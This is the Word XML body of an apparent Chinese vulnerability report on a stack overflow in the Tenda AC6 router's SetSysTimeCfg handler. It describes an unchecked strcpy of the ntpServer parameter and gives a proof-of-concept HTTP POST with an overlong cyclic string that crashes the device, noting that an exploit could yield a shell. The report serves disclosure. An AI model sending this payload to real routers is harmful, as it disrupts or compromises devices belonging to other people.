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C6AE" w14:textId="77777777" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26ABF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概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92BC2E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厂商网站：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1"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腾达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(Tenda)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官方网站</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="144A08AE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固件下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1"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AC6V5.0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升级软件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_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腾达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(Tenda)</w:t>
        </w:r>
        <w:r w:rsidRPr="00B26ABF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官方网站</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="773BB820" w14:textId="77777777" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26ABF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1.</w:t>
      </w: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影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49139750" w14:textId="454B745F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BC3B65" wp14:editId="5485EF7D">
            <wp:extent cx="5274310" cy="2960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34A" w14:textId="77777777" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26ABF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2.</w:t>
      </w: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漏洞细节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25709E97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栈溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80BCE0" w14:textId="062BD16D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DF8D8" wp14:editId="4CDAF9DD">
            <wp:extent cx="5274310" cy="3306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DC28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程序将从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ntpServer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参数获取的内容传递给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src,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然后通过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strcpy()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函数将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src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内容传递给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v16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v16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在栈上，拷贝没有检查大小，存在栈溢出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CAAE5" w14:textId="77777777" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26ABF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3.</w:t>
      </w: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复现漏洞和</w:t>
      </w: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poc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26ABF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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674EE28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为了复现此漏洞，可以通过一下步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE13BA3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qemu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仿真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ac6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路由器或购买一个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ac6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型号的腾达路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9C484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用以下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poc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攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4CFCC" w14:textId="77777777" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26AB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POST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goform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SetSysTimeCfg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HTTP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1.1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Host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192.168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-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Agent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Mozilla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5.0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Windows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NT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10.0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Win64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x64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;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rv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99.0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Gecko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20100101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Firefox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/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26ABF">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>99.0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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Accept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t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26ABF">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*</w:t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/*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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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X-Requested-With: XMLHttpRequest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Content-Length: 239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Origin: http://192.168.0.1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lastRenderedPageBreak/>
        <w:t>Connection: close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Referer: http://192.168.0.1/system_time.html?random=0.22809384670156563&amp;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Cookie: password=25d55ad283aa400af464c76d713c07adqxt1qw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B26AB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B26ABF">
        <w:rPr>
          <w:rFonts w:ascii="var(--monospace)" w:eastAsia="宋体" w:hAnsi="var(--monospace)" w:cs="宋体"/>
          <w:color w:val="AA5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>timePeriod=86400&amp;ntpServer=aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaamxaamyaamzaanbaancaandaaneaanfaangaanhaaniaanjaankaanlaanmaannaanoaanpaanqaanraansaantaanuaanvaanwaanxaanyaanzaaobaaocaaodaaoeaaofaaogaaohaaoiaaojaaokaaolaaomaaonaaooaaopaaoqaaoraaosaaotaaouaaovaaowaaoxaaoyaaozaapbaapcaapdaapeaapfaapgaaphaapiaapjaapkaaplaapmaapnaapoaappaapqaapraapsaaptaapuaapvaapwaapxaapyaapzaaqbaaqcaaqdaaqeaaqfaaqgaaqhaaqiaaqjaaqkaaqlaaqmaaqnaaqoaaqpaaqqaaqraaqsaaqtaaquaaqvaaqwaaqxaaqyaaqzaarbaarcaardaareaarfaargaarhaariaarjaarkaarlaarmaarnaaroaarpaarqaarraarsaartaaruaarvaarwaarxaaryaarzaasbaascaasdaaseaasfaasgaashaasiaasjaaskaaslaasmaasnaasoaaspaasqaasraassaastaasuaasvaaswaasxaasyaaszaatbaatcaatdaateaatfaatgaathaatiaatjaatkaatlaatmaatnaatoaatpaatqaatraatsaattaatuaatvaatwaatxaatyaat&amp;timeZone=20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994A8C4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poc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会造成下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B3103" w14:textId="0FFF64BC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842D5" wp14:editId="33A45684">
            <wp:extent cx="5274310" cy="29470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059" w14:textId="77777777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可以编写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exp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来稳定</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26ABF">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="宋体" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289838E9" w14:textId="742A801B" w:rsidR="00B26ABF" w:rsidRPr="00B26ABF" w:rsidRDefault="00B26ABF" w:rsidP="00B26ABF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818246" wp14:editId="41D4039B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1BC2" w14:textId="77777777" w:rsidR="00FB5567" w:rsidRDefault="00FB5567"/>
    <w:sectPr w:rsidR="00FB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F"/>
    <w:rsid w:val="00B26ABF"/>
    <w:rsid w:val="00FB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F5AF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{03504924-F5A2-4D4B-9D24-5CB0EDA7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26A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26A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B26ABF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="md-end-block">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00B26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meta-i-c">
    <w:name w:val="md-meta-i-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B26ABF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B26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6ABF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B26ABF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B26ABF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-number">
    <w:name w:val="cm-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B26ABF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-comment">
    <w:name w:val="cm-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B26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0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enda.com.cn/download/detail-3242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nda.com.cn/default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ee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>L ee</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-22T10:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-22T10:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>